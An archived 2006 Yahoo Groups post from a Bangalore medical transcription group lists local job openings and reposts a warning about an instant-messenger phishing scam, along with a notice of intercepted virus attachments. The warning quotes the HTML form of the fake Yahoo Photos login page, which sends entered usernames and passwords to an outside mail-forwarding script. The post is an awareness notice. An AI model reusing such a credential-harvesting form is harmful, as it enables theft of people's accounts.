Search the web
Sign In
New User? Sign Up
bangaloremt · bangaloreMT.com
? Already a member? Sign in to Yahoo!

Yahoo! Groups Tips

Did you know...
Want your group to be featured on the Yahoo! Groups website? Add a group photo to Flickr.

Best of Y! Groups

   Check them out and nominate your group.
Having problems with message search? Fill out this form to ensure your group is one of the first to be migrated to the new message search system.

Messages

  Messages Help
Advanced
latest job openings inside plus bangaloremt virus attack intercepted   Message List  
Reply | Forward Message #108 of 233 |

 Latest Job Openings - April  2006

 Wanted

 

Senior Transcribers-(20)

Min 2 years experience (salary Rs. 10,000 pm)

Editors-(10)

Min 3 years experience (salary Rs. 12,000 pm)

QAs

Min 5 years experience (salary Rs. 15,000 pm)

email

iimt7 (@) vsnl.com

Company

Innovations

Address

#867, 1st Floor, 23rd Main, 11th 'B' Cross, 2nd Phase,
 JP Nagar, Bangalore-78

phone

2659 6977, 93410 35732 

 

 Wanted

MTs

Min 2 years experience

Company

Uniscribe Solutions

Details

 Already available on www.bangaloreMT.com MT companies section.

 

 Wanted

 

MTs/ Proofers/Editors

Company

Thunga Software Pvt. Ltd., 

Address

#94, K. H. Road, Bangalore -27

 

 Wanted

 

MTs

 Experienced

Proofers

 Experienced

MT Trainers

Company

 Lake Systems Pvt. Ltd.

Address

 Already available on www.bangaloreMT.com  MT companies section.

 

 Wanted

 

Experienced MTs, Freshers (finished formal training), Experienced QA/QCs

Company

Tharang Transcribe

Ph

99454 76945

Address

#304/171, Vijayanagar Pipeline Road, Vijayanagar, Bangalore-40.

 

 Wanted

 

MTs, Editors

Company

 Jaya Infotech, Jayanagar

Details

 Already available on www.bangaloreMT.com MT companies section.

Note

All the information are excerpts of job openings collected from various sources of the media.  In spite of efforts,  there could be errors in the information. Pl. verify from alternate sources.
 Any error can be brought to the notice of bangaloreMT.com for changes.

 

Virus info

WARNING!! Suspicious IMs & Botnets

Folks, this is a reminder that its a dangerous world out there.

I received some very suspicious activity via instant messenger (IM). I received the following message via Yahoo IM this morning from a friend's Yahoo IM:

---DONT EVER CLICK THIS LINK
SoAndSo: http://www.geocities.com/thesepicsarehot
---

The page that loads looks like Yahoo Photos and asks for your Yahoo username and password to login. However, the action within the code shows that your Yahoo credentials are sent to a highly suspicious e-mail address:

<FORM METHOD="POST" ACTION="http://www2.fiberbit.net/form/mailto.cgi" ENCTYPE="x-www-form-urlencoded">
   <INPUT TYPE="hidden" NAME="Mail_From" VALUE="Yahoo">
   <INPUT TYPE="hidden" NAME="Mail_To" VALUE="oifdaddy@...">
   <INPUT TYPE="hidden" NAME="Mail_Subject" VALUE="Yahoo id">
   <INPUT TYPE="hidden" NAME="Next_Page" VALUE="http://photos.yahoo.com/ph//my_photos">

As far as I can tell there isn't any information on this in Vulnwatch, Vulndiscuss or Bugtraq.

I talked to some friends at Arbor Networks and Support-Intelligence who are phishing experts and these threats are becoming both significantly more common and blended with other threats such as botnets.

Moral of the story? Don't click on strange links.

Please help to increase awareness of these threats and do not submit your username and password to websites sent to you via IM or e-mail. Also, please be notify those folks you interact with to beware as well.

If there is a chance you or someone you know has taken the bait, change all of your passwords immediately and stop sending any confidential e-mail to your Yahoo e-mail address!
 INFO SOURCE:  http://www.randybias.com/

VIRUS ATTACK ON bangaloreMTs  THWARTED
A virus attack on bangaloreMT.com via yahoogroups to send attachments what seem to be sexual content, but actually virus, which originated from IP address
66.218.66.167, CORTLAND, NY, UNITED STATES was intercepted and deleted.
Another virus was received from IP ADDRESS:  210.211.184.180. 
If the IP address belongs to anyone in the group and it has sent virus without your knowledge, pls. run antivirus and change your password.



Fri Apr 7, 2006 3:49 am

bangaloremt
Offline Offline
Send Email Send Email

Forward
Message #108 of 233 |
Expand Messages Author Sort by Date

Latest Job Openings - April 2006 Wanted Senior Transcribers-(20) Min 2 years experience (salary Rs. 10,000 pm) Editors-(10) Min 3 years experience (salary Rs....
bangaloremt
Offline Send Email
Apr 7, 2006
3:59 am
Advanced

Copyright © 2009 Yahoo! Inc. All rights reserved.
Privacy Policy - Terms of Service - Guidelines - Help